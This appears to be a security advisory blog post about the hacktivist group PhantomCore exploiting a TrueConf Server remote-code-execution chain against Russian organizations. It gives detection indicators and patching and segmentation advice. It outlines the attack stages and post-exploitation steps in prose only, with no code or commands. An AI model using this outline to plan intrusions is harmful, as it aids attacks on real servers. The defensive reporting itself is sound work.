TrueConf Server RCE: PhantomCore Exploit Chain — Patch Now

Overview of PhantomCore Campaigns

A pro-Ukrainian hacktivist group identified as PhantomCore has been observed targeting Russian organizations through the exploitation of critical vulnerabilities in communication infrastructure. Active since at least September 2025, the group has focused its efforts on servers running TrueConf video conferencing software, a popular alternative to Western platforms in the region. according to The Hacker News, research from Positive Technologies indicates that these attackers are utilizing a sophisticated exploit chain to gain unauthorized access to corporate networks.

The campaign highlights a shift in the hacktivist landscape, where groups are moving beyond simple DDoS attacks toward complex operations involving RCE and deep network penetration. By targeting localized software solutions, PhantomCore capitalizes on the concentrated attack surface created by the regional transition to domestic software stacks.

Analyzing the TrueConf video conferencing software RCE exploit

The core of the PhantomCore campaign involves an exploit chain comprising three distinct vulnerabilities. While specific CVE identifiers were not immediately assigned in the initial reporting, the chain functions by bypassing authentication and leveraging improper input validation to achieve remote code execution. This allows an unauthenticated attacker to execute arbitrary commands with the privileges of the TrueConf service.

Technical analysis suggests the first stage of the attack targets the web-based management interface. By chaining a path traversal or logic flaw with a secondary vulnerability in the internal API, the attackers can upload malicious payloads. The final step in the TrueConf video conferencing software RCE exploit involves triggering the execution of these payloads via the server’s backend processing engine. This methodical approach ensures that even if one vulnerability is mitigated by basic firewalls, the multi-stage nature of the attack remains viable against unpatched installations.

PhantomCore Hacktivist Group TTPs and Post-Exploitation

Once initial access is established, the TTP profile of PhantomCore shifts toward persistence and reconnaissance. The group typically deploys custom C2 frameworks designed to blend in with legitimate TrueConf traffic, making detection difficult for standard EDR solutions that are not tuned for specific video conferencing protocols.

Evidence suggests that PhantomCore prioritizes the exfiltration of sensitive meeting data, contact lists, and internal documents. Furthermore, the group has been observed attempting Lateral Movement within the compromised environment. By harvesting credentials stored in memory or exploiting further internal vulnerabilities, they move from the perimeter video conferencing server to core domain controllers and file servers. This behavior aligns with the MITRE ATT&CK framework’s descriptions of advanced persistent threats, despite the group’s hacktivist branding.

How to Detect TrueConf Server Compromise

Security teams must implement proactive monitoring to identify signs of exploitation. When researching how to detect TrueConf server compromise, defenders should prioritize the following IoC categories:

• Log Anomalies: Examine TrueConf Server web logs for unusual POST requests to administrative endpoints, particularly those originating from external IP addresses not associated with known administrators.
• Process Monitoring: Monitor for unexpected child processes spawned by the TrueConf service executable, such as cmd.exe, powershell.exe, or shell scripts.
• Network Traffic: Look for outbound connections to unknown or suspicious IP addresses, which may indicate the establishment of a C2 channel.

Mitigation and Recommendations

To defend against the PhantomCore threat, organizations must adopt a Zero Trust approach to their communication infrastructure. The following actions are recommended:

1. Immediate Patching: Update all TrueConf Server instances to the most recent version provided by the vendor. This is the only definitive way to break the exploit chain.
2. Network Segmentation: Place video conferencing servers in a dedicated DMZ and restrict their ability to initiate connections to the internal network.
3. Access Control: Ensure the management interface is only accessible via a VPN or from specific, authorized management workstations. Multi-factor authentication should be enforced for all administrative accounts to prevent Privilege Escalation.